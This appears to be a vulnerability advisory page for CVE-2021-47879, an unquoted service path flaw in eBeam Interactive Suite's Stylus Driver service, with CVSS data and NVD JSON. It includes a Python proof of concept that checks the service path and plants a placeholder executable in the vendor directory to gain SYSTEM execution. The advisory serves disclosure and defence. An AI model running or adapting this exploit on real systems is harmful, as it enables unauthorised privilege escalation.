Security Vulnerability Report
CVE-2021-47879 CVSS 7.8 HIGH

CVE-2021-47879

Published: 2026-01-21 18:16:22
Last Modified: 2026-04-15 00:35:42

Description

eBeam Interactive Suite 3.6 contains an unquoted service path vulnerability in the eBeam Stylus Driver service that allows local users to potentially execute code with elevated privileges. Attackers can exploit the unquoted path in C:\Program Files (x86)\Luidia\eBeam Stylus Driver\ to inject malicious executables that would run with LocalSystem permissions.

CVSS Details

CVSS Score
7.8
Severity
HIGH
CVSS Vector
CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H

Configurations (Affected Products)

No configuration data available.

eBeam Interactive Suite 3.6

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
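# CVE-2021-47879 PoC - Unquoted Service Path Privilege Escalation
# Target: eBeam Stylus Driver Service
# This PoC demonstrates the unquoted service path vulnerability
#
# Weakness class: CWE-428 (unquoted search path or element). The remedy for
# this class is to wrap the service's ImagePath value in double quotes and to
# keep the parent directories of the service binary non-writable for
# unprivileged users.
import os
import shutil
import subprocess
import sys


def _is_unquoted_path_with_space(binary_path):
    """Return True when *binary_path* is unquoted and its image path has a space.

    Only the part up to and including the first ``.exe`` is inspected, so
    spaces that belong to command-line arguments do not count. When no
    ``.exe`` is present the whole value is inspected.
    """
    if not binary_path or binary_path.startswith('"'):
        return False
    exe_end = binary_path.lower().find('.exe')
    image = binary_path if exe_end == -1 else binary_path[:exe_end + 4]
    return ' ' in image


def check_vulnerability(sc_output=None):
    """Check whether the eBeam Stylus Driver service path is unquoted.

    Args:
        sc_output: Optional text of ``sc qc`` output captured earlier. When
            omitted, ``sc qc "eBeam Stylus Driver"`` is run on this host.

    Returns:
        True when the first BINARY_PATH_NAME line holds an unquoted image
        path containing a space; False when the path is quoted, has no space,
        the line is missing, or the query fails.
    """
    if sc_output is None:
        try:
            # Query service configuration using sc command
            result = subprocess.run(
                ['sc', 'qc', 'eBeam Stylus Driver'],
                capture_output=True,
                text=True,
            )
        except (OSError, subprocess.SubprocessError, UnicodeError) as e:
            print(f'[-] Error checking service: {e}')
            return False
        sc_output = result.stdout

    for line in sc_output.splitlines():
        if 'BINARY_PATH_NAME' not in line:
            continue
        print(f'[*] Found service path: {line.strip()}')
        # Test the value after the label, not the whole line: the label
        # padding always contains spaces, which would flag every unquoted
        # path, including ones without any space in them.
        binary_path = line.partition(':')[2].strip()
        if _is_unquoted_path_with_space(binary_path):
            print('[+] VULNERABLE: Path contains spaces without quotes')
            return True
        print('[-] NOT VULNERABLE or path is quoted')
        return False
    return False


def exploit():
    """Copy this script (or the frozen executable) into the vendor directory.

    The copied file is a benign placeholder, not a payload. The copy only
    succeeds when the current user may write to the target directory, so a
    failure here indicates that the directory ACL blocks the placement.
    Defenders can look for the same artifact: a new executable created
    directly in a parent directory of the service binary.
    """
    # Malicious executable name (depends on the unquoted path)
    # For example, if path is C:\Program Files (x86)\Luidia\eBeam Stylus Driver\service.exe
    # We can place malicious.exe in C:\Program Files (x86)\Luidia\
    # NOTE(review): whether this file name is one the service start would
    # resolve depends on the exact ImagePath; not verified here.
    malicious_exe = 'Luidia.exe'  # or 'eBeam.exe' depending on the path
    target_path = r'C:\Program Files (x86)\Luidia'
    malicious_path = os.path.join(target_path, malicious_exe)

    # Create the directory if it doesn't exist
    if not os.path.exists(target_path):
        os.makedirs(target_path)

    # In a real attack, this would be a malicious executable
    # For demonstration, we create a benign file
    print(f'[*] Creating malicious executable at: {malicious_path}')

    # Copy current executable or create a placeholder
    if hasattr(sys, 'frozen'):
        malicious_code = sys.executable
    else:
        malicious_code = sys.argv[0]

    try:
        shutil.copy(malicious_code, malicious_path)
        print('[+] Malicious executable placed successfully')
        print(f'[*] When the service restarts, it may execute {malicious_exe} with SYSTEM privileges')
        print('[*] Note: Service restart required for exploitation')
    except Exception as e:
        print(f'[-] Failed to place malicious executable: {e}')


if __name__ == '__main__':
    print('=== CVE-2021-47879 Unquoted Service Path PoC ===')
    print('Target: eBeam Interactive Suite - eBeam Stylus Driver')
    print()
    if check_vulnerability():
        print('\n[*] Proceeding with exploitation...')
        exploit()
    else:
        print('\n[-] Target is not vulnerable or service not found')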

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2021-47879", "sourceIdentifier": "[email protected]", "published": "2026-01-21T18:16:22.093", "lastModified": "2026-04-15T00:35:42.020", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "eBeam Interactive Suite 3.6 contains an unquoted service path vulnerability in the eBeam Stylus Driver service that allows local users to potentially execute code with elevated privileges. Attackers can exploit the unquoted path in C:\\Program Files (x86)\\Luidia\\eBeam Stylus Driver\\ to inject malicious executables that would run with LocalSystem permissions."}, {"lang": "es", "value": "eBeam Interactive Suite 3.6 contiene una vulnerabilidad de ruta de servicio sin comillas en el servicio eBeam Stylus Driver que permite a los usuarios locales ejecutar código potencialmente con privilegios elevados. Los atacantes pueden explotar la ruta sin comillas en C:\\Program Files (x86)\\Luidia\\eBeam Stylus Driver\\ para inyectar ejecutables maliciosos que se ejecutarían con permisos de LocalSystem."}], "metrics": {"cvssMetricV40": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "4.0", "vectorString": "CVSS:4.0/AV:L/AC:L/AT:N/PR:L/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X", "baseScore": 8.5, "baseSeverity": "HIGH", "attackVector": "LOCAL", "attackComplexity": "LOW", "attackRequirements": "NONE", "privilegesRequired": "LOW", "userInteraction": "NONE", "vulnConfidentialityImpact": "HIGH", "vulnIntegrityImpact": "HIGH", "vulnAvailabilityImpact": "HIGH", "subConfidentialityImpact": "NONE", "subIntegrityImpact": "NONE", "subAvailabilityImpact": "NONE", "exploitMaturity": "NOT_DEFINED", "confidentialityRequirement": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "availabilityRequirement": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", 
"modifiedAttackRequirements": "NOT_DEFINED", "modifiedPrivilegesRequired": "NOT_DEFINED", "modifiedUserInteraction": "NOT_DEFINED", "modifiedVulnConfidentialityImpact": "NOT_DEFINED", "modifiedVulnIntegrityImpact": "NOT_DEFINED", "modifiedVulnAvailabilityImpact": "NOT_DEFINED", "modifiedSubConfidentialityImpact": "NOT_DEFINED", "modifiedSubIntegrityImpact": "NOT_DEFINED", "modifiedSubAvailabilityImpact": "NOT_DEFINED", "Safety": "NOT_DEFINED", "Automatable": "NOT_DEFINED", "Recovery": "NOT_DEFINED", "valueDensity": "NOT_DEFINED", "vulnerabilityResponseEffort": "NOT_DEFINED", "providerUrgency": "NOT_DEFINED"}}], "cvssMetricV31": [{"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "baseScore": 7.8, "baseSeverity": "HIGH", "attackVector": "LOCAL", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 1.8, "impactScore": 5.9}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-428"}]}], "references": [{"url": "http://esvc000385.wic045u.server-web.com/Downloads/eBeam/", "source": "[email protected]"}, {"url": "https://www.exploit-db.com/exploits/49648", "source": "[email protected]"}, {"url": "https://www.vulncheck.com/advisories/ebeam-interactive-suite-ebeam-stylus-driver-unquoted-service-path", "source": "[email protected]"}]}}